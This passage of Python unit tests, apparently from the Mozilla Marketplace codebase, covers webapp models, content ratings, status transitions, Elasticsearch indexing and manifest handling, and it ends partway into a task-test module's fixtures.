                eq_(webapp.get_tier(), None)
    def test_device_types(self):
        AddonDeviceType.objects.create(addon_id=337141,
                                       device_type=self.device)
        webapps = list(Webapp.objects.filter(id=337141))
        with self.assertNumQueries(0):
            for webapp in webapps:
                assert webapp._device_types
                eq_(webapp.device_types, [DEVICE_TYPES[self.device]])
    def test_device_type_cache(self):
        """A pre-populated (even empty) _device_types cache is honoured."""
        webapp = Webapp.objects.get(id=337141)
        webapp._device_types = []
        with self.assertNumQueries(0):
            eq_(webapp.device_types, [])
class TestDetailsComplete(amo.tests.TestCase):
    """Walk an app through the details-completeness checklist, asserting
    the expected missing-field error at each step.

    NOTE(review): the original helper was named ``fail``, which shadowed
    ``unittest.TestCase.fail``. unittest calls ``self.fail(msg)`` internally
    to report assertion failures, so any failing ``assertEqual`` etc. in
    this class would have been routed into the helper (calling app logic
    with the failure message) instead of raising cleanly. Renaming the
    helper restores the inherited ``fail`` behaviour; test logic is
    otherwise unchanged.
    """

    def setUp(self):
        # Any known device type will do; we only need one to satisfy the
        # "device" completeness requirement.
        self.device = DEVICE_TYPES.keys()[0]
        self.cat = Category.objects.create(name='c', type=amo.ADDON_WEBAPP)
        self.webapp = Webapp.objects.create(type=amo.ADDON_WEBAPP,
                                            status=amo.STATUS_NULL)

    def _expect_incomplete(self, value):
        """Assert the app is incomplete and `value` names the first
        reported missing detail."""
        assert not self.webapp.details_complete(), value
        reasons = self.webapp.details_errors()
        assert value in reasons[0], reasons

    def test_fail(self):
        # Fill in one requirement at a time and check the next missing
        # detail is reported, until the app is fully complete.
        self._expect_incomplete('email')
        self.webapp.support_email = 'a@a.com'
        self.webapp.save()
        self._expect_incomplete('name')
        self.webapp.name = 'name'
        self.webapp.save()
        self._expect_incomplete('device')
        self.webapp.addondevicetype_set.create(device_type=self.device)
        self.webapp.save()
        self._expect_incomplete('category')
        AddonCategory.objects.create(addon=self.webapp, category=self.cat)
        self._expect_incomplete('screenshot')
        self.webapp.previews.create()
        eq_(self.webapp.details_complete(), True)
class TestAddonExcludedRegion(amo.tests.WebappTestCase):
    """Tests for per-app region exclusions (AddonExcludedRegion)."""
    def setUp(self):
        super(TestAddonExcludedRegion, self).setUp()
        self.excluded = self.app.addonexcludedregion
        # Starts empty; create one exclusion (UK) for the tests to use.
        eq_(list(self.excluded.values_list('id', flat=True)), [])
        self.er = self.app.addonexcludedregion.create(region=mkt.regions.UK.id)
        eq_(list(self.excluded.values_list('id', flat=True)), [self.er.id])
    def test_exclude_multiple(self):
        other = AddonExcludedRegion.objects.create(addon=self.app,
                                                   region=mkt.regions.BR.id)
        self.assertSetEqual(self.excluded.values_list('id', flat=True),
                            [self.er.id, other.id])
    def test_remove_excluded(self):
        self.er.delete()
        eq_(list(self.excluded.values_list('id', flat=True)), [])
    def test_get_region(self):
        eq_(self.er.get_region(), mkt.regions.UK)
    def test_unicode(self):
        eq_(unicode(self.er), '%s: %s' % (self.app, mkt.regions.UK.slug))
class TestContentRating(amo.tests.WebappTestCase):
    """Tests for ContentRating region/body/rating lookups.

    Region ratingsbody attributes are patched per-test so the assertions
    do not depend on the real region configuration.
    """
    def setUp(self):
        self.app = self.get_app()
        self.create_switch('iarc')
    @mock.patch.object(mkt.regions.BR, 'ratingsbody',
                       mkt.ratingsbodies.CLASSIND)
    @mock.patch.object(mkt.regions.US, 'ratingsbody', mkt.ratingsbodies.ESRB)
    @mock.patch.object(mkt.regions.VE, 'ratingsbody',
                       mkt.ratingsbodies.GENERIC)
    def test_get_regions_and_slugs(self):
        """A CLASSIND rating maps only to regions whose body is CLASSIND."""
        classind_rating = ContentRating.objects.create(
            addon=self.app, ratings_body=mkt.ratingsbodies.CLASSIND.id,
            rating=0)
        regions = classind_rating.get_regions()
        assert mkt.regions.BR in regions
        assert mkt.regions.US not in regions
        assert mkt.regions.VE not in regions
        slugs = classind_rating.get_region_slugs()
        assert mkt.regions.BR.slug in slugs
        assert mkt.regions.US.slug not in slugs
        assert mkt.regions.VE.slug not in slugs
    @mock.patch.object(mkt.regions.BR, 'ratingsbody',
                       mkt.ratingsbodies.CLASSIND)
    @mock.patch.object(mkt.regions.DE, 'ratingsbody', mkt.ratingsbodies.ESRB)
    @mock.patch.object(mkt.regions.VE, 'ratingsbody',
                       mkt.ratingsbodies.GENERIC)
    def test_get_regions_and_slugs_generic_fallback(self):
        """GENERIC ratings cover GENERIC-body regions plus the catch-all
        generic region slug, but not regions with a dedicated body."""
        gen_rating = ContentRating.objects.create(
            addon=self.app, ratings_body=mkt.ratingsbodies.GENERIC.id,
            rating=0)
        regions = gen_rating.get_regions()
        assert mkt.regions.BR not in regions
        assert mkt.regions.DE not in regions
        assert mkt.regions.VE in regions
        slugs = gen_rating.get_region_slugs()
        assert mkt.regions.BR.slug not in slugs
        assert mkt.regions.DE.slug not in slugs
        assert mkt.regions.VE.slug not in slugs
        # We have a catch-all 'generic' region for all regions wo/ r.body.
        assert mkt.regions.GENERIC_RATING_REGION_SLUG in slugs
    @mock.patch.object(mkt.ratingsbodies.CLASSIND, 'name', 'CLASSIND')
    @mock.patch.object(mkt.ratingsbodies.CLASSIND_10, 'name', '10+')
    @mock.patch.object(mkt.ratingsbodies.ESRB_E, 'name', 'Everybody 10+')
    @mock.patch.object(mkt.ratingsbodies.ESRB_E, 'label', '10')
    def test_get_ratings(self):
        # Infer the label from the name.
        cr = ContentRating.objects.create(
            addon=self.app, ratings_body=mkt.ratingsbodies.CLASSIND.id,
            rating=mkt.ratingsbodies.CLASSIND_10.id)
        eq_(cr.get_rating().label, '10')
        eq_(cr.get_body().label, 'classind')
        # When already has label set.
        eq_(ContentRating.objects.create(
            addon=self.app, ratings_body=mkt.ratingsbodies.ESRB.id,
            rating=mkt.ratingsbodies.ESRB_E.id).get_rating().label,
            '10')
class TestContentRatingsIn(amo.tests.WebappTestCase):
    """Tests for Webapp.content_ratings_in() / listed_in() region and
    category filtering."""
    def test_not_in_region(self):
        """An unrated app has no ratings in any region, excluded or not."""
        for region in mkt.regions.ALL_REGIONS:
            eq_(self.app.content_ratings_in(region=region), [])
        for region in mkt.regions.ALL_REGIONS:
            AddonExcludedRegion.objects.create(addon=self.app,
                                               region=region.id)
            eq_(self.get_app().content_ratings_in(region=region), [])
    def test_in_for_region_and_category(self):
        # Category may be passed as a slug string or a Category instance.
        cat = Category.objects.create(slug='games', type=amo.ADDON_WEBAPP)
        for region in mkt.regions.ALL_REGIONS:
            eq_(self.app.content_ratings_in(region=region, category='games'),
                [])
            eq_(self.app.content_ratings_in(region=region, category=cat), [])
    def test_in_region_and_category(self):
        # make_game() puts the app in the 'games' category.
        self.make_game()
        cat = Category.objects.get(slug='games')
        for region in mkt.regions.ALL_REGIONS:
            eq_(self.app.listed_in(region=region, category='games'), True)
            eq_(self.app.listed_in(region=region, category=cat),
                True)
    def test_in_region_and_not_in_category(self):
        cat = Category.objects.create(slug='games', type=amo.ADDON_WEBAPP)
        for region in mkt.regions.ALL_REGIONS:
            eq_(self.app.content_ratings_in(region=region, category='games'),
                [])
            eq_(self.app.content_ratings_in(region=region, category=cat), [])
    @mock.patch.object(mkt.regions.CO, 'ratingsbody', None)
    @mock.patch.object(mkt.regions.BR, 'ratingsbody',
                       mkt.ratingsbodies.CLASSIND)
    def test_generic_fallback(self):
        # Test region with no rating body returns generic content rating.
        crs = ContentRating.objects.create(
            addon=self.app, ratings_body=mkt.ratingsbodies.GENERIC.id,
            rating=mkt.ratingsbodies.GENERIC_3.id)
        eq_(self.app.content_ratings_in(region=mkt.regions.CO), [crs])
        # Test region with rating body does not include generic content rating.
        assert crs not in self.app.content_ratings_in(region=mkt.regions.BR)
class TestIARCInfo(amo.tests.WebappTestCase):
    """Tests for the app's one-to-one IARC submission info."""
    def test_no_info(self):
        """Accessing iarc_info without a record raises DoesNotExist."""
        with self.assertRaises(IARCInfo.DoesNotExist):
            self.app.iarc_info
    def test_info(self):
        IARCInfo.objects.create(addon=self.app, submission_id=1,
                                security_code='s3kr3t')
        eq_(self.app.iarc_info.submission_id, 1)
        eq_(self.app.iarc_info.security_code, 's3kr3t')
class TestQueue(amo.tests.WebappTestCase):
    """Tests for re-review queue membership checks."""
    def test_in_queue(self):
        assert not self.app.in_rereview_queue()
        RereviewQueue.objects.create(addon=self.app)
        assert self.app.in_rereview_queue()
class TestPackagedSigning(amo.tests.WebappTestCase):
    """Tests for Webapp.sign_if_packaged() dispatching to the signer."""
    @mock.patch('lib.crypto.packaged.sign')
    def test_not_packaged(self, sign):
        """Hosted (non-packaged) apps are never signed."""
        self.app.update(is_packaged=False)
        assert not self.app.sign_if_packaged(self.app.current_version.pk)
        assert not sign.called
    @mock.patch('lib.crypto.packaged.sign')
    def test_packaged(self, sign):
        self.app.update(is_packaged=True)
        assert self.app.sign_if_packaged(self.app.current_version.pk)
        # The signer receives the version pk as its first positional arg.
        eq_(sign.call_args[0][0], self.app.current_version.pk)
    @mock.patch('lib.crypto.packaged.sign')
    def test_packaged_reviewer(self, sign):
        """reviewer=True is forwarded to the signer as a keyword arg."""
        self.app.update(is_packaged=True)
        assert self.app.sign_if_packaged(self.app.current_version.pk,
                                         reviewer=True)
        eq_(sign.call_args[0][0], self.app.current_version.pk)
        eq_(sign.call_args[1]['reviewer'], True)
class TestUpdateStatus(amo.tests.TestCase):
    """Tests for Webapp.update_status() transitions, with the automatic
    version/status signal handlers disconnected so each test controls
    exactly when update_status() runs."""
    def setUp(self):
        # Disabling signals to simplify these tests. We call update_status()
        # manually in them.
        version_changed_signal.disconnect(version_changed,
                                          dispatch_uid='version_changed')
        post_save.disconnect(update_status, sender=Version,
                             dispatch_uid='version_update_status')
        post_delete.disconnect(update_status, sender=Version,
                               dispatch_uid='version_update_status')
    def tearDown(self):
        # Reconnect the handlers so other test classes see normal behaviour.
        version_changed_signal.connect(version_changed,
                                       dispatch_uid='version_changed')
        post_save.connect(update_status, sender=Version,
                          dispatch_uid='version_update_status')
        post_delete.connect(update_status, sender=Version,
                            dispatch_uid='version_update_status')
    def test_no_versions(self):
        """No versions at all -> app falls back to STATUS_NULL."""
        app = Webapp.objects.create(status=amo.STATUS_PUBLIC)
        app.update_status()
        eq_(app.status, amo.STATUS_NULL)
    def test_version_no_files(self):
        """A version without files does not count -> STATUS_NULL."""
        app = Webapp.objects.create(status=amo.STATUS_PUBLIC)
        Version(addon=app).save()
        app.update_status()
        eq_(app.status, amo.STATUS_NULL)
    def test_only_version_deleted(self):
        app = amo.tests.app_factory(status=amo.STATUS_REJECTED)
        app.current_version.delete()
        app.update_status()
        eq_(app.status, amo.STATUS_NULL)
    def test_other_version_deleted(self):
        """Deleting one of several versions keeps the current status."""
        app = amo.tests.app_factory(status=amo.STATUS_REJECTED)
        amo.tests.version_factory(addon=app)
        app.current_version.delete()
        app.update_status()
        eq_(app.status, amo.STATUS_REJECTED)
    def test_one_version_pending(self):
        """A rejected app with a new pending version moves to PENDING,
        but only if it is fully complete (mocked True here)."""
        app = amo.tests.app_factory(status=amo.STATUS_REJECTED,
                                    file_kw=dict(status=amo.STATUS_DISABLED))
        amo.tests.version_factory(addon=app,
                                  file_kw=dict(status=amo.STATUS_PENDING))
        with mock.patch('mkt.webapps.models.Webapp.is_fully_complete') as comp:
            comp.return_value = True
            app.update_status()
        eq_(app.status, amo.STATUS_PENDING)
    def test_one_version_pending_not_fully_complete(self):
        app = amo.tests.app_factory(status=amo.STATUS_REJECTED,
                                    file_kw=dict(status=amo.STATUS_DISABLED))
        amo.tests.version_factory(addon=app,
                                  file_kw=dict(status=amo.STATUS_PENDING))
        with mock.patch('mkt.webapps.models.Webapp.is_fully_complete') as comp:
            comp.return_value = False
            app.update_status()
        eq_(app.status, amo.STATUS_REJECTED)  # Didn't change.
    def test_one_version_public(self):
        app = amo.tests.app_factory(status=amo.STATUS_PUBLIC)
        amo.tests.version_factory(addon=app,
                                  file_kw=dict(status=amo.STATUS_DISABLED))
        app.update_status()
        eq_(app.status, amo.STATUS_PUBLIC)
    def test_was_public_waiting_then_new_version(self):
        """PUBLIC_WAITING apps stay waiting when a pending version lands."""
        app = amo.tests.app_factory(status=amo.STATUS_PUBLIC_WAITING)
        File.objects.filter(version__addon=app).update(status=app.status)
        amo.tests.version_factory(addon=app,
                                  file_kw=dict(status=amo.STATUS_PENDING))
        app.update_status()
        eq_(app.status, amo.STATUS_PUBLIC_WAITING)
    def test_blocklisted(self):
        """Blocked apps never leave STATUS_BLOCKED via update_status()."""
        app = amo.tests.app_factory(status=amo.STATUS_BLOCKED)
        app.current_version.delete()
        app.update_status()
        eq_(app.status, amo.STATUS_BLOCKED)
class TestInstalled(amo.tests.TestCase):
    """Tests for Installed.objects.safer_get_or_create keyed on
    install_type."""
    def setUp(self):
        user = UserProfile.objects.create(email='f@f.com')
        app = Addon.objects.create(type=amo.ADDON_WEBAPP)
        # Partial bound to one (user, addon); tests vary only install_type.
        self.m = functools.partial(Installed.objects.safer_get_or_create,
                                   user=user, addon=app)
    def test_install_type(self):
        # Index [1] is the get_or_create "created" flag: True on first
        # creation per install_type, False when the row already exists.
        assert self.m(install_type=apps.INSTALL_TYPE_USER)[1]
        assert not self.m(install_type=apps.INSTALL_TYPE_USER)[1]
        assert self.m(install_type=apps.INSTALL_TYPE_REVIEWER)[1]
class TestAppFeatures(DynamicBoolFieldsTestMixin, amo.tests.TestCase):
    """Tests for the AppFeatures dynamic boolean flags on a version."""
    def setUp(self):
        super(TestAppFeatures, self).setUp()
        # Configuration consumed by DynamicBoolFieldsTestMixin helpers.
        self.model = AppFeatures
        self.related_name = 'features'
        self.BOOL_DICT = mkt.constants.features.APP_FEATURES
        self.flags = ('APPS', 'GEOLOCATION', 'PAY', 'SMS')
        self.expected = [u'App Management API', u'Geolocation', u'Web Payment',
                         u'WebSMS']
        self.af = AppFeatures.objects.get()
    def _get_related_bool_obj(self):
        return getattr(self.app.current_version, self.related_name)
    def test_signature_parity(self):
        # Test flags -> signature -> flags works as expected.
        self._flag()
        signature = self.app.current_version.features.to_signature()
        eq_(signature.count('.'), 2, 'Unexpected signature format')
        self.af.set_flags(signature)
        self._check(self.af)
    def test_bad_data(self):
        # Malformed signatures must be ignored without raising.
        self.af.set_flags('foo')
        self.af.set_flags('<script>')
    def test_default_false(self):
        """All feature flags default to False on a fresh object."""
        obj = self.model(version=self.app.current_version)
        eq_(getattr(obj, 'has_%s' % self.flags[0].lower()), False)
class TestWebappIndexer(amo.tests.TestCase):
    """Tests for the WebappIndexer Elasticsearch mapping and document
    extraction."""
    fixtures = fixture('webapp_337141')
    def setUp(self):
        self.app = Webapp.objects.get(pk=337141)
    def test_mapping_type_name(self):
        eq_(WebappIndexer.get_mapping_type_name(), 'webapp')
    def test_index(self):
        with self.settings(ES_INDEXES={'webapp': 'apps'}):
            eq_(WebappIndexer.get_index(), 'apps')
    def test_model(self):
        eq_(WebappIndexer.get_model(), Webapp)
    def test_mapping(self):
        mapping = WebappIndexer.get_mapping()
        eq_(mapping.keys(), ['webapp'])
        eq_(mapping['webapp']['_all'], {'enabled': False})
        eq_(mapping['webapp']['_boost'], {'name': '_boost', 'null_value': 1.0})
    def test_mapping_properties(self):
        # Spot check a few of the key properties.
        mapping = WebappIndexer.get_mapping()
        keys = mapping['webapp']['properties'].keys()
        for k in ('id', 'app_slug', 'category', 'default_locale',
                  'description', 'device', 'features', 'name', 'status'):
            ok_(k in keys, 'Key %s not found in mapping properties' % k)
    def _get_doc(self):
        """Run the indexing transformer on self.app and return
        (object, extracted ES document)."""
        qs = Webapp.indexing_transformer(
            Webapp.objects.no_cache().filter(id__in=[self.app.pk]))
        obj = qs[0]
        return obj, WebappIndexer.extract_document(obj.pk, obj)
    def test_extract(self):
        obj, doc = self._get_doc()
        eq_(doc['id'], obj.id)
        eq_(doc['app_slug'], obj.app_slug)
        eq_(doc['category'], [])
        eq_(doc['default_locale'], obj.default_locale)
        # Plain fields are de-duplicated strings; *_translations keep the
        # per-locale breakdown.
        eq_(doc['description'], list(
            set(s for _, s in obj.translations[obj.description_id])))
        eq_(doc['description_translations'],
            [{'lang': to_language(l), 'string': s}
             for l, s in obj.translations[obj.description_id]])
        eq_(doc['device'], [])
        eq_(doc['name'], list(
            set(s for _, s in obj.translations[obj.name_id])))
        eq_(doc['name_translations'],
            [{'lang': to_language(l), 'string': s}
             for l, s in obj.translations[obj.name_id]])
        eq_(doc['status'], obj.status)
        eq_(doc['is_escalated'], False)
        eq_(doc['latest_version']['status'], amo.STATUS_PUBLIC)
        eq_(doc['latest_version']['has_editor_comment'], False)
        eq_(doc['latest_version']['has_info_request'], False)
    def test_extract_category(self):
        cat = Category.objects.create(name='c', type=amo.ADDON_WEBAPP)
        AddonCategory.objects.create(addon=self.app, category=cat)
        obj, doc = self._get_doc()
        eq_(doc['category'], [cat.slug])
    def test_extract_device(self):
        device = DEVICE_TYPES.keys()[0]
        AddonDeviceType.objects.create(addon=self.app, device_type=device)
        obj, doc = self._get_doc()
        eq_(doc['device'], [device])
    def test_extract_features(self):
        enabled = ('has_apps', 'has_sms', 'has_geolocation')
        self.app.current_version.features.update(
            **dict((k, True) for k in enabled))
        obj, doc = self._get_doc()
        # Only the enabled flags are True in the extracted doc.
        for k, v in doc['features'].iteritems():
            eq_(v, k in enabled)
    def test_extract_regions(self):
        self.app.addonexcludedregion.create(region=mkt.regions.BR.id)
        self.app.addonexcludedregion.create(region=mkt.regions.UK.id)
        obj, doc = self._get_doc()
        self.assertSetEqual(doc['region_exclusions'],
                            set([mkt.regions.BR.id, mkt.regions.UK.id]))
    def test_extract_supported_locales(self):
        locales = 'en-US,es,pt-BR'
        self.app.current_version.update(supported_locales=locales)
        obj, doc = self._get_doc()
        self.assertSetEqual(doc['supported_locales'], set(locales.split(',')))
    def test_extract_latest_version(self):
        # latest_version reflects the newest version even when rejected.
        amo.tests.version_factory(addon=self.app, version='43.0',
                                  has_editor_comment=True,
                                  has_info_request=True,
                                  file_kw=dict(status=amo.STATUS_REJECTED))
        obj, doc = self._get_doc()
        eq_(doc['latest_version']['status'], amo.STATUS_REJECTED)
        eq_(doc['latest_version']['has_editor_comment'], True)
        eq_(doc['latest_version']['has_info_request'], True)
    def test_extract_is_escalated(self):
        EscalationQueue.objects.create(addon=self.app)
        obj, doc = self._get_doc()
        eq_(doc['is_escalated'], True)
    def test_extract_content_ratings(self):
        ContentRating.objects.create(
            addon=self.app, ratings_body=mkt.ratingsbodies.CLASSIND.id,
            rating=0)
        ContentRating.objects.create(
            addon=self.app, ratings_body=mkt.ratingsbodies.GENERIC.id,
            rating=0)
        ContentRating.objects.create(
            addon=self.app, ratings_body=mkt.ratingsbodies.PEGI.id,
            rating=mkt.ratingsbodies.PEGI_12.id)
        obj, doc = self._get_doc()
        content_ratings = doc['content_ratings']
        eq_(len(content_ratings), 3)
        eq_(doc['content_ratings']['classind'],
            {'body': mkt.ratingsbodies.CLASSIND.id,
             'rating': mkt.ratingsbodies.CLASSIND_L.id})
        eq_(doc['content_ratings']['generic'],
            {'body': mkt.ratingsbodies.GENERIC.id,
             'rating': mkt.ratingsbodies.GENERIC_3.id})
        eq_(doc['content_ratings']['pegi'],
            {'body': mkt.ratingsbodies.PEGI.id,
             'rating': mkt.ratingsbodies.PEGI_12.id})
    def test_extract_release_notes(self):
        # Release-notes translations are extracted sorted by locale.
        release_notes = {
            'fr': u'Dès notes de version.',
            'en-US': u'Some release nötes.'
        }
        version = self.app.current_version
        version.releasenotes = release_notes
        version.save()
        obj, doc = self._get_doc()
        eq_(doc['release_notes_translations'][0],
            {'lang': 'en-US', 'string': release_notes['en-US']})
        eq_(doc['release_notes_translations'][1],
            {'lang': 'fr', 'string': release_notes['fr']})
class TestRatingDescriptors(DynamicBoolFieldsTestMixin, amo.tests.TestCase):
    """Tests for the RatingDescriptors dynamic boolean flags and their
    IARC name mappings."""
    def setUp(self):
        super(TestRatingDescriptors, self).setUp()
        # Configuration consumed by DynamicBoolFieldsTestMixin helpers.
        self.model = RatingDescriptors
        self.related_name = 'rating_descriptors'
        self.BOOL_DICT = mkt.ratingdescriptors.RATING_DESCS
        self.flags = ('ESRB_VIOLENCE', 'PEGI_LANG', 'CLASSIND_DRUGS')
        self.expected = [u'Violence', u'Language', u'Drugs']
        RatingDescriptors.objects.create(addon=self.app)
    @mock.patch.dict('mkt.ratingdescriptors.RATING_DESCS',
                     PEGI_LANG={'name': _(u'H\xe9llo')})
    def test_to_list_nonascii(self):
        """Non-ASCII descriptor names survive the to_list() round trip."""
        self.expected[1] = u'H\xe9llo'
        self._flag()
        to_list = self.app.rating_descriptors.to_list()
        self.assertSetEqual(self.to_unicode(to_list), self.expected)
    def test_desc_mapping(self):
        # Every IARC native descriptor maps to an existing model field.
        descs = RatingDescriptors.objects.create(addon=app_factory())
        for body, mapping in DESC_MAPPING.items():
            for native, rating_desc_field in mapping.items():
                assert hasattr(descs, rating_desc_field), rating_desc_field
    def test_reverse_desc_mapping(self):
        # Every model field maps back to a unicode IARC native name.
        descs = RatingDescriptors.objects.create(addon=app_factory())
        for desc in descs._fields():
            eq_(type(REVERSE_DESC_MAPPING.get(desc)), unicode, desc)
    def test_iarc_deserialize(self):
        descs = RatingDescriptors.objects.create(
            addon=app_factory(), has_esrb_blood=True, has_pegi_scary=True)
        self.assertSetEqual(descs.iarc_deserialize().split(', '),
                            ['Blood', 'Fear'])
        # Filtering by body returns only that body's descriptors.
        eq_(descs.iarc_deserialize(body=mkt.ratingsbodies.ESRB), 'Blood')
class TestRatingInteractives(DynamicBoolFieldsTestMixin, amo.tests.TestCase):
    """Tests for the RatingInteractives dynamic boolean flags and their
    IARC interactive-element mappings."""
    def setUp(self):
        super(TestRatingInteractives, self).setUp()
        # Configuration consumed by DynamicBoolFieldsTestMixin helpers.
        self.model = RatingInteractives
        self.related_name = 'rating_interactives'
        self.BOOL_DICT = mkt.ratinginteractives.RATING_INTERACTIVES
        self.flags = ('SHARES_INFO', 'DIGITAL_PURCHASES', 'USERS_INTERACT')
        self.expected = [u'Shares Info', u'Digital Purchases',
                         u'Users Interact']
        RatingInteractives.objects.create(addon=self.app)
    def test_interactives_mapping(self):
        # Every IARC native element maps to an existing model field.
        interactives = RatingInteractives.objects.create(addon=app_factory())
        for native, field in INTERACTIVES_MAPPING.items():
            assert hasattr(interactives, field)
    def test_reverse_interactives_mapping(self):
        # Every model field maps back to an IARC native element name.
        interactives = RatingInteractives.objects.create(addon=app_factory())
        for interactive_field in interactives._fields():
            assert REVERSE_INTERACTIVES_MAPPING.get(interactive_field)
    def test_iarc_deserialize(self):
        interactives = RatingInteractives.objects.create(
            addon=app_factory(), has_users_interact=True, has_shares_info=True)
        self.assertSetEqual(
            interactives.iarc_deserialize().split(', '),
            ['Shares Info', 'Users Interact'])
class TestManifestUpload(BaseUploadTest, amo.tests.TestCase):
    """Tests for Addon.manifest_updated() applying version/developer-name
    changes parsed from an uploaded manifest."""
    fixtures = fixture('webapp_337141')
    @mock.patch('mkt.webapps.models.parse_addon')
    def test_manifest_updated_developer_name(self, parse_addon):
        parse_addon.return_value = {
            'version': '4.0',
            'developer_name': u'Méâ'
        }
        # Note: we need a valid FileUpload instance, but in the end we are not
        # using its contents since we are mocking parse_addon().
        path = os.path.join(settings.ROOT, 'mkt', 'developers', 'tests',
                            'addons', 'mozball.webapp')
        upload = self.get_upload(abspath=path, is_webapp=True)
        app = Addon.objects.get(pk=337141)
        app.manifest_updated('', upload)
        version = app.current_version.reload()
        eq_(version.version, '4.0')
        eq_(version.developer_name, u'Méâ')
    @mock.patch('mkt.webapps.models.parse_addon')
    def test_manifest_updated_long_developer_name(self, parse_addon):
        """Developer names longer than 255 chars are truncated on save."""
        truncated_developer_name = u'é' * 255
        long_developer_name = truncated_developer_name + u'ßßßß'
        parse_addon.return_value = {
            'version': '4.1',
            'developer_name': long_developer_name,
        }
        # Note: we need a valid FileUpload instance, but in the end we are not
        # using its contents since we are mocking parse_addon().
        path = os.path.join(settings.ROOT, 'mkt', 'developers', 'tests',
                            'addons', 'mozball.webapp')
        upload = self.get_upload(abspath=path, is_webapp=True)
        app = Addon.objects.get(pk=337141)
        app.manifest_updated('', upload)
        version = app.current_version.reload()
        eq_(version.version, '4.1')
        eq_(version.developer_name, truncated_developer_name)
class TestGeodata(amo.tests.WebappTestCase):
    """Tests for the per-app Geodata record (regional statuses and
    banner regions)."""
    def setUp(self):
        super(TestGeodata, self).setUp()
        self.geo = self.app.geodata
    def test_app_geodata(self):
        assert isinstance(Webapp(id=337141).geodata, Geodata)
    def test_unicode(self):
        eq_(unicode(self.geo),
            u'%s (unrestricted): <Webapp 337141>' % self.geo.id)
        self.geo.update(restricted=True)
        eq_(unicode(self.geo),
            u'%s (restricted): <Webapp 337141>' % self.geo.id)
    def test_get_status(self):
        # Default region status is STATUS_NULL.
        eq_(self.geo.get_status(mkt.regions.CN), amo.STATUS_NULL)
        eq_(self.geo.region_cn_status, amo.STATUS_NULL)
    def test_set_status(self):
        status = amo.STATUS_PUBLIC
        # Called with `save=False`.
        self.geo.set_status(mkt.regions.CN, status)
        eq_(self.geo.region_cn_status, status)
        eq_(self.geo.reload().region_cn_status, amo.STATUS_NULL,
            '`set_status(..., save=False)` should not save the value')
        # Called with `save=True`.
        self.geo.set_status(mkt.regions.CN, status, save=True)
        eq_(self.geo.region_cn_status, status)
        eq_(self.geo.reload().region_cn_status, status)
    def test_banner_regions_names(self):
        eq_(self.geo.banner_regions, None)
        eq_(self.geo.banner_regions_names(), [])
        self.geo.update(banner_regions=[mkt.regions.UK.id, mkt.regions.CN.id])
        # Names come back sorted alphabetically, not in insert order.
        eq_(self.geo.banner_regions_names(), [u'China', u'United Kingdom'])
@mock.patch.object(settings, 'PRE_GENERATE_APKS', True)
@mock.patch('mkt.webapps.tasks.pre_generate_apk')
class TestPreGenAPKs(amo.tests.WebappTestCase):
    """Tests that saving an app triggers (or skips) the APK
    pre-generation task depending on status, device type and the
    PRE_GENERATE_APKS setting."""
    def setUp(self):
        super(TestPreGenAPKs, self).setUp()
        self.manifest_url = 'http://some-app.com/manifest.webapp'
        self.app.update(status=amo.STATUS_PUBLIC,
                        manifest_url=self.manifest_url)
        # Set up the app to support Android.
        self.app.addondevicetype_set.create(device_type=amo.DEVICE_MOBILE.id)
    def switch_device(self, device_id):
        """Replace all of the app's device types with `device_id`."""
        self.app.addondevicetype_set.all().delete()
        self.app.addondevicetype_set.create(device_type=device_id)
    def test_approved_apps(self, pre_gen_task):
        assert not pre_gen_task.delay.called
        self.app.save()
        pre_gen_task.delay.assert_called_with(self.app.id)
    def test_unapproved_apps(self, pre_gen_task):
        self.app.update(status=amo.STATUS_REJECTED)
        assert not pre_gen_task.delay.called, (
            'APKs for unapproved apps should not be pre-generated')
    def test_disabled(self, pre_gen_task):
        with self.settings(PRE_GENERATE_APKS=False):
            self.app.save()
        assert not pre_gen_task.delay.called, (
            'task should not be called if PRE_GENERATE_APKS is False')
    def test_ignore_firefox_os_apps(self, pre_gen_task):
        self.switch_device(amo.DEVICE_GAIA.id)
        self.app.save()
        assert not pre_gen_task.delay.called, (
            'task should not be called for Firefox OS apps')
    def test_treat_tablet_as_android(self, pre_gen_task):
        self.switch_device(amo.DEVICE_TABLET.id)
        self.app.save()
        assert pre_gen_task.delay.called, (
            'task should be called for tablet apps')
class TestSearchSignals(amo.tests.ESTestCase):
    """Tests that app create/update signals keep the Elasticsearch index
    in sync."""
    def setUp(self):
        super(TestSearchSignals, self).setUp()
        self.addCleanup(self.cleanup)
    def cleanup(self):
        # Drop all test indexes; missing indexes are fine.
        for index in settings.ES_INDEXES.values():
            try:
                self.es.delete_index(index)
            except pyelasticsearch.ElasticHttpNotFoundError:
                pass
    def test_create(self):
        eq_(S(WebappIndexer).count(), 0)
        amo.tests.app_factory()
        self.refresh()
        eq_(S(WebappIndexer).count(), 1)
    def test_update(self):
        """Renaming an app reindexes it under the new name only."""
        app = amo.tests.app_factory()
        self.refresh()
        eq_(S(WebappIndexer).count(), 1)
        prev_name = unicode(app.name)
        app.name = 'yolo'
        app.save()
        self.refresh()
        eq_(S(WebappIndexer).count(), 1)
        eq_(S(WebappIndexer).query(name=prev_name).count(), 0)
        eq_(S(WebappIndexer).query(name='yolo').count(), 1)
########NEW FILE########
__FILENAME__ = test_tasks
# -*- coding: utf-8 -*-
import datetime
import hashlib
import json
import os
import stat
import tarfile
from copy import deepcopy
from tempfile import mkdtemp
from django.conf import settings
from django.core.files.storage import default_storage as storage
from django.core import mail
from django.core.management import call_command
from django.core.urlresolvers import reverse
import mock
from nose.tools import eq_, ok_
from requests.exceptions import RequestException
import amo
import amo.tests
from addons.models import Addon, AddonUser, Preview
from amo.helpers import absolutify
from devhub.models import ActivityLog
from editors.models import RereviewQueue
from files.models import File, FileUpload
from users.models import UserProfile
from versions.models import Version
from mkt.site.fixtures import fixture
from mkt.webapps.models import Webapp
from mkt.webapps.tasks import (dump_app, dump_user_installs,
export_data,
notify_developers_of_failure,
pre_generate_apk,
PreGenAPKError,
rm_directory,
update_manifests,
zip_apps)
# Manifest fixture representing the currently-stored copy of an app's
# manifest (version 0.1, no "developer" block). Written to disk in
# TestUpdateManifest.setUp as the baseline.
original = {
    "version": "0.1",
    "default_locale": "en-US",
    "name": "MozillaBall",
    "description": "Exciting Open Web development action!",
    "icons": {
        "16": "http://test.com/icon-16.png",
        "48": "http://test.com/icon-48.png",
        "128": "http://test.com/icon-128.png"
    },
    "installs_allowed_from": [
        "*",
    ],
    "locales": {
        "de": {
            "name": "Mozilla Kugel"
        },
        "fr": {
            "description": "Testing name-less locale"
        }
    }
}
# Updated manifest as "fetched" from the developer's server: version bumped
# to 1.0 and a "developer" block added. Tests mutate a deepcopy of this.
new = {
    "version": "1.0",
    "default_locale": "en-US",
